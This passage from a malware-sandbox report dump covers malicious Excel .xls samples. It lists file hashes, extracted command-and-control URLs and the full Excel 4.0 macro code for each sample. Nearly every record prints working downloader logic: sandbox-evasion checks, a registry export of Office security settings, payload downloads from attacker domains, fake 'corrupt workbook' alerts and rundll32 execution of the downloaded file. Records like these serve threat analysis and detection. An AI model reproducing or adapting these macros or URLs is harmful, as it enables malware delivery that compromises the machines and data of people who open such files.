CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wQWp8ouMmt\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"321097653894bcfe2eb1a3c5dfbe9be8ca15055dc043aa7b6a45b75285f8482b"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"321097653894bcfe2eb1a3c5dfbe9be8ca15055dc043aa7b6a45b75285f8482b","filesize":206336,"md5":"ee9904bbde1cb5eb25710cd2f7c13419","sha1":"9a8b76a268e0ce6435744711707fb79a78ab2965","sha256":"321097653894bcfe2eb1a3c5dfbe9be8ca15055dc043aa7b6a45b75285f8482b","sha512":"3eb591b33b6408ca7d1fa282bb11213deef23442fbe7efb33cf9ac24115a103d63d9829e31dbb02dd4789d8c4aff63626d95a427965d968ea9f54319d568ff81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"321097653894bcfe2eb1a3c5dfbe9be8ca15055dc043aa7b6a45b75285f8482b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Jg1qj3h0BZ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3218f35c0711c4cb9bd278ea4690368102e6c2832972333dc9632612ea8c817f"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"3218f35c0711c4cb9bd278ea4690368102e6c2832972333dc9632612ea8c817f","filesize":168960,"md5":"f009890f7a2461eb2a2231d37c58398c","sha1":"a1006e5a47792f3c7f2affa80881eb39e097833f","sha256":"3218f35c0711c4cb9bd278ea4690368102e6c2832972333dc9632612ea8c817f","sha512":"9acf538c8d7147ec6f1680b33a5c7805cc08062c1bd6131ce751768170dddb2c014983b7f31a7b43b405edf62b5f20e942ef8d2ac558bf96a2a3cf155518852d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3218f35c0711c4cb9bd278ea4690368102e6c2832972333dc9632612ea8c817f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Kgt3dgKVKW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3225632245203264a97caa7771ca50c2121f9b5ce35e98f9cde79845baba9435"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"3225632245203264a97caa7771ca50c2121f9b5ce35e98f9cde79845baba9435","filesize":185344,"md5":"46e2edc3d224c2a235998aa792b3d345","sha1":"670504511c3b69357b83f51dc164c779ee5a5bd1","sha256":"3225632245203264a97caa7771ca50c2121f9b5ce35e98f9cde79845baba9435","sha512":"7dd6e800be32b59d0f96b6570bb0bc33f221254e38cc63916daba863e2b28fa3650202c6afa870acd1a9afe04099187ba59befa2ade918002e77c4c1bf391523","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3225632245203264a97caa7771ca50c2121f9b5ce35e98f9cde79845baba9435.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3229301bd2feb88ca67060b27a5b1961fb17961eade5a9e75b09fc10dae2a42e"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"3229301bd2feb88ca67060b27a5b1961fb17961eade5a9e75b09fc10dae2a42e","filesize":170496,"md5":"00dfefca1f68aa3311c1fbe5987f7d28","sha1":"958fd9421570ab0b7c25cf241aba1437ee28f33d","sha256":"3229301bd2feb88ca67060b27a5b1961fb17961eade5a9e75b09fc10dae2a42e","sha512":"5c789fca2e6a947cbda656a2e04da3273b2706975ea9d56cc15378f2f260d040e7ed26bdf4e0f23e535cd6c05e82943f49589f64f135fabbba7478bb390f49ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3229301bd2feb88ca67060b27a5b1961fb17961eade5a9e75b09fc10dae2a42e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Cyb1phyegO\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"322d212b45a1aded5a99f51f7814d5301dce9b4720f8857d2d0dee21f2cd6388"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"322d212b45a1aded5a99f51f7814d5301dce9b4720f8857d2d0dee21f2cd6388","filesize":185344,"md5":"2e1ee1002b339dcb0dce1b0c465ff50f","sha1":"db5dd18760ada1d7d6aac588886de497a3561397","sha256":"322d212b45a1aded5a99f51f7814d5301dce9b4720f8857d2d0dee21f2cd6388","sha512":"fcb666914d24e831c37283d5d74010bcc07f57e635540503b835c8092c17d2319aef3eef76c10f73839f2167a3a21fe42a183a96be9bc3c773156987428acf10","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"322d212b45a1aded5a99f51f7814d5301dce9b4720f8857d2d0dee21f2cd6388.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3243a59e8f5a03efe96898b1289fb613ed19a1e6a0f11a7706120d083d150922"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"3243a59e8f5a03efe96898b1289fb613ed19a1e6a0f11a7706120d083d150922","filesize":206336,"md5":"a37d5efbf5f313fc9ca649facb9f33a1","sha1":"4513e1e8e1823c27cb3bb32c670b5360be77ae04","sha256":"3243a59e8f5a03efe96898b1289fb613ed19a1e6a0f11a7706120d083d150922","sha512":"901566d2ca8411fb5c39b9d29e86bf43f58d8904cc8052d378d753196a347454012b2d1902fb96f574028f5dd0d609d62bd3125f042daffe74e1696ad6a5fda1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3243a59e8f5a03efe96898b1289fb613ed19a1e6a0f11a7706120d083d150922.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dHscfKUpr5\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"324568bec747f7312d71049c14c317d94897c603857926153203965e30f88e8e"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"324568bec747f7312d71049c14c317d94897c603857926153203965e30f88e8e","filesize":209920,"md5":"d5066d639686e2c127b6b858e1b4b995","sha1":"531ff8ab21b5fec5f757205a4cec19ab64c28434","sha256":"324568bec747f7312d71049c14c317d94897c603857926153203965e30f88e8e","sha512":"f845aa7fe67e2822748f3c6fc422372fbcbc59f5593fd9dfd8151ae30e47af3593f07fc0c48a2062f320960768b6755cca9dcc9e0b24e4366acac9af59d3a677","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"324568bec747f7312d71049c14c317d94897c603857926153203965e30f88e8e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rIy8eE4uu0\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3248dccaf4c5e5e3ddf55b1f4e1d678712eddba7f6f57fe76749b71f76a83148"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"3248dccaf4c5e5e3ddf55b1f4e1d678712eddba7f6f57fe76749b71f76a83148","filesize":167936,"md5":"70c5efe91b9df06e63b72b18884b5262","sha1":"f92f3a8d9837e3ed55a5feb9158d803db03f9342","sha256":"3248dccaf4c5e5e3ddf55b1f4e1d678712eddba7f6f57fe76749b71f76a83148","sha512":"e0f6a5979a32a551caa2bb48273e9a82eefb185ea2e42cb66442da9eb25d64715433fbda0fc20f53a3308f3e5df775d467412e13214041cb14e627ebe2abb99f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3248dccaf4c5e5e3ddf55b1f4e1d678712eddba7f6f57fe76749b71f76a83148.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7MzVpaeGu4\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"324c6208bc2fc51aef456513286d919c864cf364cfba1be72d47991a835ae553"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"324c6208bc2fc51aef456513286d919c864cf364cfba1be72d47991a835ae553","filesize":185344,"md5":"b40079af4c3683b38ecba436e288e8ec","sha1":"45cbb7f88fd411053da417c2ef9ea799df594f9b","sha256":"324c6208bc2fc51aef456513286d919c864cf364cfba1be72d47991a835ae553","sha512":"286383a8196ad813e3f8f43bfcbb08adc69524f1064f6fbe488436821d359cb5f6f2f0b9b1362f54f9e1a416377e0b9edbdc4e9abbee857bd5200c3bfbabd60a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"324c6208bc2fc51aef456513286d919c864cf364cfba1be72d47991a835ae553.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"325ac3e2c5a47ce5d35517dee51006c90db8d73d6ee26df85c61a82a13fcf032"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"325ac3e2c5a47ce5d35517dee51006c90db8d73d6ee26df85c61a82a13fcf032","filesize":168448,"md5":"1f6b51931e91bb75c395e00ca0054539","sha1":"dd4661cac84f0456c6be6a8f44514d645ee52631","sha256":"325ac3e2c5a47ce5d35517dee51006c90db8d73d6ee26df85c61a82a13fcf032","sha512":"d9796d89d37c8cd069fd383619825e5d0c158e154dc9523eff555b3417af6c4253fcdf9a514d9bfa4042b36ca0644614bf2d2ff6117c664ea5ebe5921c525d0e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"325ac3e2c5a47ce5d35517dee51006c90db8d73d6ee26df85c61a82a13fcf032.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yO1VE3T10G\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"325eaa6b3e4ff391042bf3bd61c62a3c83cccd286baf41701a4114e35c398ad2"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"325eaa6b3e4ff391042bf3bd61c62a3c83cccd286baf41701a4114e35c398ad2","filesize":185344,"md5":"d8dcc41647646afbc06c11ba5ea16341","sha1":"1ee1a9e8482ef63a10f1cd9b086645ecf2f2cf8e","sha256":"325eaa6b3e4ff391042bf3bd61c62a3c83cccd286baf41701a4114e35c398ad2","sha512":"c1c2454d0eb0259ee0175c20cbb4c3fcf4f58d00326093d2066223918cce6a2888e0052e1caad05362afe14feb4ed0f5156ee9db2f95cd8f53d132d5214c35ff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"325eaa6b3e4ff391042bf3bd61c62a3c83cccd286baf41701a4114e35c398ad2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"326e9a9f9e34e5fb7a2d78114c24c7ae3a0758bad9d80512cd7481e89dcba402"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"326e9a9f9e34e5fb7a2d78114c24c7ae3a0758bad9d80512cd7481e89dcba402","filesize":185344,"md5":"707da7644f85e5b938806044115d4d63","sha1":"5779017be520f45c38d256eb2fb2e2fc4f86d4e1","sha256":"326e9a9f9e34e5fb7a2d78114c24c7ae3a0758bad9d80512cd7481e89dcba402","sha512":"59078413b05d8cb24662482bf29385f218f939b1bae9fe109b783d9325182f068d0f0b8832953a9e77af0d52f7013e6b83d0c53c5b10cbbb2245d0e5a865b2ed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"326e9a9f9e34e5fb7a2d78114c24c7ae3a0758bad9d80512cd7481e89dcba402.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3285ae1b0bad9deff7f8ace11bb701cbf3f030e7bf316be1153923837e5a5eb7"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"3285ae1b0bad9deff7f8ace11bb701cbf3f030e7bf316be1153923837e5a5eb7","filesize":152576,"md5":"4ee1acac9231b529fbc4d834da1c6aed","sha1":"4ce2817a0445493309c4d759245b25ae1ea3ff58","sha256":"3285ae1b0bad9deff7f8ace11bb701cbf3f030e7bf316be1153923837e5a5eb7","sha512":"321978d6e4a2f670b0d94861495d54560b57d4f44bd4e3e4166cf80ebfb1d5b761d72ba567871f2cfd0025e67a13eb3ec5c83914cdafbdc26167b739ac2e1f32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3285ae1b0bad9deff7f8ace11bb701cbf3f030e7bf316be1153923837e5a5eb7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"clBO8n4lLR\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"32936e01bf99f46d90c0924f24d99f2e7d8e06831c7ae7872949e848f61d8516"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"32936e01bf99f46d90c0924f24d99f2e7d8e06831c7ae7872949e848f61d8516","filesize":206336,"md5":"cbcbccea985375f7c684ee8561cf3518","sha1":"3e81432aefa3df6b04922be69fc94cf3203fce2b","sha256":"32936e01bf99f46d90c0924f24d99f2e7d8e06831c7ae7872949e848f61d8516","sha512":"82f8baab68cfcd912f9f0464303d0c8bf1f9b9413eac62ccbb4b22b2d426cfe7970105cde6817430e9fea2b1b148c97fadb3d3f23a17c2f3d4723f96975d6971","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"32936e01bf99f46d90c0924f24d99f2e7d8e06831c7ae7872949e848f61d8516.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UVGiLDaoqe\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"329604b9ea1772f94b4c4dbb2dde78b53982db1d52830590c720e339e44b286a"},"analysis":{"reported":"2020-04-09T16:15:40Z","score":10},"files":[{"filename":"329604b9ea1772f94b4c4dbb2dde78b53982db1d52830590c720e339e44b286a","filesize":168448,"md5":"2fa43597167c07d2f8d1693b9b2c4267","sha1":"2473ffe1120ed1a62841b1533bf8496db1f26cf9","sha256":"329604b9ea1772f94b4c4dbb2dde78b53982db1d52830590c720e339e44b286a","sha512":"3e593160418c3ba585a69ca70366c70c301cf6a3cb3779287f70f4f07294f96e592bc809389eb5ca95d56ba2e8b0242d87ff0179e148bd6a1c4c7ca68fdb879c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"329604b9ea1772f94b4c4dbb2dde78b53982db1d52830590c720e339e44b286a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, 